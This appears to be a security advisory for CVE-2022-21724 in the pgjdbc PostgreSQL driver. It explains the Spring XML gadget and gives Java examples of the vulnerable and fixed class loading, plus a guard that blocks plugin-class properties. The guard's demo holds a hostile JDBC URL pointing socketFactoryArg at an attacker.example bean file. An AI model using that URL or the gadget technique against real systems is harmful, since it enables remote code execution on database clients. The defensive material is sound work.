CVE-2022-21724
Arbitrary Code Execution vulnerability in org.postgresql:postgresql
What is CVE-2022-21724 About?
This vulnerability in pgjdbc allows for arbitrary code execution due to improper validation of plugin class names provided via connection properties. An attacker can specify a malicious class name, typically an out-of-the-box class from frameworks like Spring, to execute arbitrary code. The impact is significant, and exploitation is relatively easy once a connection string can be manipulated.
Affected Software
- org.postgresql:postgresql
  - >=9.4.1208, <42.2.25
  - >=42.3.0, <42.3.2
Technical Details
The `pgjdbc` driver instantiates plugin objects by reflection from class names supplied through connection properties such as `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, and `sslpasswordcallback`. The flaw is that the driver did not verify that the named class implements the expected plugin interface before constructing it, so the constructor of any class on the application's classpath can be run, in some cases with a caller-chosen `String` argument. Spring Framework's `org.springframework.context.support.ClassPathXmlApplicationContext` is the commonly cited gadget: set `socketFactory` to that class and `socketFactoryArg` to the location of an attacker-controlled XML bean definition, and the driver constructs the application context while opening the connection, which loads the XML and instantiates the beans it declares, executing attacker-controlled code. Note that this is reflective instantiation of an arbitrary class with an attacker-controlled constructor argument, not Java deserialization; the fix adds a check that the named class is assignable to the expected interface before it is instantiated.
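The pattern, reduced to a few lines, as an added example that is not pgjdbc's code: `loadUnchecked` models the pre-fix behaviour (class name taken from a property, reflective construction, no type check) and `loadChecked` models the fix (refuse any class that is not assignable to the expected interface before any constructor runs). `Canary` is a stand-in for a gadget class such as `ClassPathXmlApplicationContext`; its `String` constructor only records its argument, but in the unchecked path it runs to completion even though the result is later rejected by a `ClassCastException`. The expected interface is `javax.net.SocketFactory`, the argument string is a placeholder, and all class and method names in the block are constructed for illustration.

```java
import javax.net.SocketFactory;

// Added example modelling CVE-2022-21724; not pgjdbc source.
public class PluginLoader {

    /** Stands in for a gadget class: any side effect of its constructor is the "payload". */
    public static final class Canary {
        static volatile String lastArg;           // records that the constructor ran, and with what
        public Canary(String arg) { lastArg = arg; }
    }

    /** Vulnerable pattern: trusts the class name from a connection property. */
    @SuppressWarnings("unchecked")
    public static <T> T loadUnchecked(Class<T> expected, String className, String arg)
            throws ReflectiveOperationException {
        Class<?> cls = Class.forName(className);  // also runs the class's static initializer
        // A (String) constructor is preferred (this is how socketFactoryArg is passed),
        // otherwise the no-arg constructor. Nothing checks that cls is an 'expected'.
        Object instance = (arg != null)
                ? cls.getConstructor(String.class).newInstance(arg)
                : cls.getConstructor().newInstance();
        return (T) instance;                      // erased cast: fails only at the call site, after side effects
    }

    /** Hardened pattern: verify the type before any constructor or static initializer executes. */
    public static <T> T loadChecked(Class<T> expected, String className, String arg)
            throws ReflectiveOperationException {
        // initialize=false: load the class without running its static initializer
        Class<?> cls = Class.forName(className, false, PluginLoader.class.getClassLoader());
        if (!expected.isAssignableFrom(cls)) {
            throw new IllegalArgumentException(className + " is not a " + expected.getName());
        }
        Object instance = (arg != null)
                ? cls.getConstructor(String.class).newInstance(arg)
                : cls.getConstructor().newInstance();
        return expected.cast(instance);
    }

    public static void main(String[] args) throws Exception {
        String gadget = Canary.class.getName();   // in the real bug: a Spring class on the classpath
        String payloadArg = "classpath:evil.xml";  // placeholder for an attacker-chosen socketFactoryArg

        try {
            SocketFactory sf = loadUnchecked(SocketFactory.class, gadget, payloadArg);
            System.out.println("unexpected: " + sf);
        } catch (ClassCastException e) {
            System.out.println("unchecked: constructor already ran with arg=" + Canary.lastArg
                    + " before the cast failed");
        }

        Canary.lastArg = null;
        try {
            SocketFactory sf = loadChecked(SocketFactory.class, gadget, payloadArg);
            System.out.println("unexpected: " + sf);
        } catch (IllegalArgumentException e) {
            System.out.println("checked: " + e.getMessage()
                    + "; constructor ran=" + (Canary.lastArg != null));
        }
    }
}
```

Note the three-argument `Class.forName(name, false, loader)` in the checked path: with `initialize=false` the class's static initializer does not run before the type check, whereas the one-argument `Class.forName` used in the unchecked path initializes the class, which is itself a way to run attacker-selected code before any constructor is called.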
What is the Impact of CVE-2022-21724?
Successful exploitation executes arbitrary code inside the JVM of the application that uses pgjdbc (the database client, not the PostgreSQL server), with that application's privileges, potentially leading to full compromise of that host, theft of any data the application can reach, or data manipulation.
What is the Exploitability of CVE-2022-21724?
Exploitation requires control over the connection properties the application passes to the driver, either in the JDBC URL or in the `Properties` object handed to `DriverManager.getConnection`. That control can come from access to a configuration file, injection into environment variables, or application input that is folded into the connection string. No database credentials are needed: the plugin class is instantiated by the driver while the connection is being set up (`socketFactory`, for example, is constructed when the driver creates the socket, before anything is sent to the server), so a connection that ultimately fails still runs the payload. The attack is remote whenever the URL or properties can be influenced remotely, for example through a tenant-supplied data-source configuration. Complexity is moderate: the attacker needs a gadget class that is already on the application's classpath and whose constructor does something useful with a caller-chosen `String` (Spring's `ClassPathXmlApplicationContext` is the commonly cited one), plus a way to make that argument resolve to attacker-controlled content. Applications that expose their database connection configuration, or let user-controlled input shape it, are the primary risk.
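Where a JDBC URL or a driver `Properties` object can be shaped by untrusted input, the application can refuse the properties that name a class before the driver ever sees them. The block below is an added example, not pgjdbc's code; `JdbcUrlGuard`, its methods, and the sample URLs, hostnames and XML location are constructed for illustration. It percent-decodes both keys and values (a conservative superset of what the driver matches, which is assumed here to be an exact, case-sensitive property name) and flags the five property names listed in the advisory, whether they arrive in the URL query string or in the `Properties` object. This is defence in depth for untrusted inputs, not a substitute for upgrading: a patched driver rejects non-conforming classes itself. It needs Java 10 or later for `URLDecoder.decode(String, Charset)`.

```java
import java.net.URI;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.Properties;
import java.util.Set;

// Added example; not pgjdbc source. Rejects connection properties that make the
// driver instantiate a class by name (the properties named in the advisory).
public final class JdbcUrlGuard {

    /** Connection properties whose value is a class name the driver will instantiate. */
    static final Set<String> PLUGIN_CLASS_PROPS = Set.of(
            "authenticationPluginClassName", "sslhostnameverifier", "socketFactory",
            "sslfactory", "sslpasswordcallback");

    /** Parse the query part of a jdbc:postgresql URL into a key/value map. */
    public static Map<String, String> parseQuery(String jdbcUrl) {
        if (!jdbcUrl.startsWith("jdbc:")) {
            throw new IllegalArgumentException("not a JDBC URL: " + jdbcUrl);
        }
        // Strip the "jdbc:" prefix so java.net.URI sees a hierarchical URL with a query.
        URI uri = URI.create(jdbcUrl.substring("jdbc:".length()));
        Map<String, String> props = new LinkedHashMap<>();
        String query = uri.getRawQuery();
        if (query == null) {
            return props;               // no query string, nothing to inspect here
        }
        for (String pair : query.split("&")) {
            if (pair.isEmpty()) continue;
            int eq = pair.indexOf('=');
            String key = eq < 0 ? pair : pair.substring(0, eq);
            String value = eq < 0 ? "" : pair.substring(eq + 1);
            // Decoding the key as well is deliberate: it catches an encoded key even if the
            // driver itself would not decode it (assumption about driver behaviour).
            props.put(URLDecoder.decode(key, StandardCharsets.UTF_8),
                      URLDecoder.decode(value, StandardCharsets.UTF_8));
        }
        return props;
    }

    /** Names of offending properties, tagged with where they came from; empty means acceptable. */
    public static List<String> findPluginClassProps(String jdbcUrl, Properties extra) {
        List<String> hits = new ArrayList<>();
        for (String key : parseQuery(jdbcUrl).keySet()) {
            if (PLUGIN_CLASS_PROPS.contains(key)) hits.add("url:" + key);
        }
        if (extra != null) {
            for (String key : extra.stringPropertyNames()) {
                if (PLUGIN_CLASS_PROPS.contains(key)) hits.add("properties:" + key);
            }
        }
        return hits;
    }

    /** Fail closed before the URL reaches DriverManager or a DataSource. */
    public static String requireNoPluginClasses(String jdbcUrl, Properties extra) {
        List<String> hits = findPluginClassProps(jdbcUrl, extra);
        if (!hits.isEmpty()) {
            throw new IllegalArgumentException("connection settings name driver plugin classes: " + hits);
        }
        return jdbcUrl;
    }

    public static void main(String[] args) {
        // Constructed sample inputs; hostnames and the XML location are placeholders.
        String benign = "jdbc:postgresql://db.internal.example:5432/app?ssl=true&sslmode=verify-full";
        String hostile = "jdbc:postgresql://db.internal.example:5432/app"
                + "?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext"
                + "&socketFactoryArg=http%3A%2F%2Fattacker.example%2Fbean.xml";
        Properties extra = new Properties();
        extra.setProperty("sslfactory", "com.example.NotAnSslFactory");

        System.out.println("benign  -> " + findPluginClassProps(benign, null));
        System.out.println("hostile -> " + findPluginClassProps(hostile, extra));
        try {
            requireNoPluginClasses(hostile, extra);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Call `requireNoPluginClasses` at the single point where externally supplied connection settings are turned into a `DataSource`; anything that legitimately needs a custom `socketFactory` or `sslfactory` should come from static, operator-controlled configuration rather than from that path.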
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | | |
What are the Available Fixes for CVE-2022-21724?
Available Upgrade Options
- org.postgresql:postgresql
  - >=9.4.1208, <42.2.25 → Upgrade to 42.2.25
  - >=42.3.0, <42.3.2 → Upgrade to 42.3.2
Additional Resources
- https://www.debian.org/security/2022/dsa-5196
- https://osv.dev/vulnerability/GHSA-v7wg-cpwc-24m4
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS/
- https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html
- https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813
- https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4
- https://security.netapp.com/advisory/ntap-20220311-0005
What are Similar Vulnerabilities to CVE-2022-21724?
Similar Vulnerabilities: CVE-2021-44228, CVE-2021-45046, CVE-2022-23305, CVE-2022-29078
